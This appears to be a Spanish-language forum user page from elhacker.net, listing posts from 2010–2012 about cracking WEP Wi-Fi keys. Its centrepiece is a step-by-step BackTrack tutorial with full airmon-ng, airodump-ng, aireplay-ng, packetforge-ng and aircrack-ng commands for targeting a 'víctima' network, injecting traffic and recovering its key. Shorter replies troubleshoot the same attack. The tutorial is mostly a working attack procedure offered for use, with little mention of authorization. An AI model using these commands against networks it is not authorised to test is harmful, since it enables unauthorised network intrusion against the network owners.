elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: [1]
1  Sistemas Operativos / GNU/Linux / Re: Problema para crackear una wifi con backtrack 4 en: 11 Diciembre 2012, 16:06 pm
Prueba con esta sintaxis:

airodump-ng --encrypt wep -c (canal) --bssid (MAC bssid) -w datos wlan0 <-(el nombre de tu interface)
2  Seguridad Informática / Wireless en Linux / Re: No soy capaz de sacar ARP's ni Data en: 12 Septiembre 2010, 02:20 am
Citar
Mi pregunta es, ¿cómo puedo ir forzando los datas a salir? ¿Aunque sea poco a poco? Pero por lo menos para poder utilizar el -2.

Eso te pasa porque no te has autentificado en la red con el -1, también por eso te pasan todos esos errores con el -4 y el -5

has probado el -8? Te hace un test....es...informativo

ya nos cuentas ;)
3  Seguridad Informática / Wireless en Linux / Re: No soy capaz de sacar ARP's ni Data en: 29 Agosto 2010, 01:05 am
pues yo nunca he cambiado la mac  :silbar:

siempre la he echo con la mac de la tarjeta wifi y siguiendo los pasos que dije en el tutorial, de echo, mas que un tutorial son unas memorias ajajja porque tipee tal cual suelo "mirar" la seguridad de mi red  :)

ya me cuentas si hay suerte ;) recuerda que si hay trafico en la red, todo ira mejor (cuando digo trafico, digo que sin hacer nada, tan solo con "airodump-ng --encrypt WEP wlan0" si tu red genera trafico, todo ira mas deprisa, sino deberas generarlo tu y te costara mas)

 ;-)
4  Seguridad Informática / Wireless en Linux / Re: No soy capaz de sacar ARP's ni Data en: 28 Agosto 2010, 11:45 am
Saludos,

recien termino de postear un tutorial para WEP ;)

mi pregunta es, ya que no lo veo por ninguna parte que lo hayas comentado: pusiste tu tarjeta de red en modo monitor con airmon-ng? (airmon-ng start tutarjetadered)

Si pusiste este comando, te fijaste que pusiera (monitor mode enabled on "tutarjetadered")?

Da mas detalles de que haces, para saber que haces mal o que te dejas por hacer para poder ayudarte mejor =)

un saludo!
5  Seguridad Informática / Wireless en Linux / Re: Crackear WEP con BackTrack SIMPLE y ATAQUE en: 28 Agosto 2010, 11:41 am
Bueno, a tanto no se si llegare jeje, solo quería transmitir mis conocimientos y que les sirva a cuantos mas mejor.

Ya se que hay mucha información, para creackear wep, pero muchas están mal, incompletas o son muy simples.

Este post, se ve simple, pero detalla paso a paso lo que se tiene que hacer.

Lo dicho, espero que les sirva como a mi me sirve siempre que tiro de ello ;)
6  Seguridad Informática / Wireless en Linux / Crackear WEP con BackTrack SIMPLE y ATAQUE en: 28 Agosto 2010, 10:57 am
Saludos  :laugh:

Bueno, aquí pongo mi granito de arena al foro ;)

Este sera un Tutorial SIMPLE para sacar claves WEP

1.- Descargar el CD de BackTrack (van por la versión 4.0 o ahi me quede yo  :silbar: )

2.- Grabar imagen.iso a CD o meter en PENDRIVE (Recomiendo GRABAR a CD)  >:D

3.- Resetear PC y arrancar el CD de BackTrack
Para ello tendremos que configurar nuestra BIOS o sino queremos calentarnos la cabeza  ;D , podemos usar la tecla F11 (en mi pc, en alguno es F8, TAB, ESC...) para iniciar en modo MENU BOOT

4.- Si pregunta por login, usaremos root y el password es toor, eso significa que tenemos problemas con la interfaz grafica, suele ser error del archivo xorg.conf situado en /etc/X11/xorg.conf

Para arreglarlo, simplemente copiaremos el backup que hay por el xorg.conf en uso
# cp /etc/X11/xorg.conf-vesa /etc/X11/xorg.conf

Y probamos a iniciar la interfaz gráfica con startx

5.- Pasamos a configurar el Layout del teclado, pues esta en USA y 104 teclas.

Para ello pincharemos con el botón derecho del ratón en la bandera, al lado de la hora y seguidamente en configure

Cambiamos 104 teclas por 105 para ello miramos "arriba" y añadimos la bandera de nuestro país que están a la "izquierda" (en mi caso España).

6.- Abrimos 4 terminales
6.1.- En el terminal 1, averiguaremos que nombre tiene nuestra interfaz wlan.
Para ello usaremos el comando iwconfig

Mi wlan se llama wlan0 asi que a partir de ahora, esta sera la interfaz, tu tendrás que poner la tuya  ::)

7.- Ponemos nuestra interfaz wlan0 en modo monitor
# airmon-ng wlan0 start

8.- En busca de la victima...
8.1.- Nos vamos un momento al terminal 2 y averiguamos nuestra MAC
# macchanger -s wlan0

8.2.- Volvemos al terminal 1 e iniciamos la pesca
# airodump-ng --encrypt WEP wlan0

EXPLICACIÓN: --encrypt WEP (es para filtrar solo las redes con cifrado WEP)

En la lista, solo tendremos que fijarnos en 2 cosas: el PWR y la #data

Estos 2 factores, son cruciales para ahorrarnos tiempo, pues el PWR nos dice la fuerza de señal con la que nos llega la red y la #data si en este momento hay trafico, si es asi, presiona CTRL+C para parar la pesca.

8.3.- Concentrándonos en la víctima
# airodump-ng --encrypt WEP -c CANAL_VÍCTIMA -bssid MAC_VICTIMA -w hack wlan0

EXPLICACIÓN:
-c CANAL_VÍCTIMA (es el canal "channel" al lado de #data
-bssid MAC_VÍCTIMA (es la MAC de la víctima a la izquierda, es lo primero

9.- "Conectándonos a su red..."
9.1.- Nos vamos al terminal 2 y ponemos:
# aireplay-ng -1 6000 -a MAC_VICTIMA -h NUESTRA_MAC wlan0

Esperamos a la carita feliz :-)

10.- Inyectando (FORMA SIMPLE)
10.1.- Nos vamos al terminal 3 y ponemos:
# aireplay-ng -3 -b MAC_VICTIMA -h NUESTRA_MAC wlan0

Y esperamos a tener suerte y con el trafico de la víctima inyectaremos trafico para conseguir 50.000 #data (cuando tengamos 10.000 #data leemos el paso 12.1)
Si no inyecta trafico pasamos a la FORMA ATAQUE, si inyecta trafico, saltate el siguiente paso.

11.- Inyectando (FORMA ATAQUE)
11.1.-En el terminal 3 ponemos
# aireplay-ng -5 -a MAC_VÍCTIMA -h NUESTRA_MAC wlan0

Buscara paquetes y cuando nos pregunte, le ponemos "y" (sin las comillas) y nos creara un archivo.xor, este archivo.xor lo tenemos que transformar en nuestra "key"

# packetforge-ng -1 -y archivo.xor -a MAC_VÍCTIMA -c NUESTRA_MAC -h NUESTRA_MAC -l 192.168.0.1 -k 192.168.0.100 -w key

11.2.- Ahora cojemos nuestra key y atacamos
#aireplay-ng -2 -r key wlan0

Nos preguntara, le decimos "y" (sin las comillas)

12.- Cuando alcancemos la cifra de 50.000 #data...
12.1.- Nos vamos al terminal 4 y ponemos:
# aircrack-ng -s *.cap

Con suerte nos sacara la clave 100% decrypted correctly  ;-)

Y eso es todo amigos ;) un saludo y espero que les sirva mi experiencia a alguien =)

by acidc00l
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines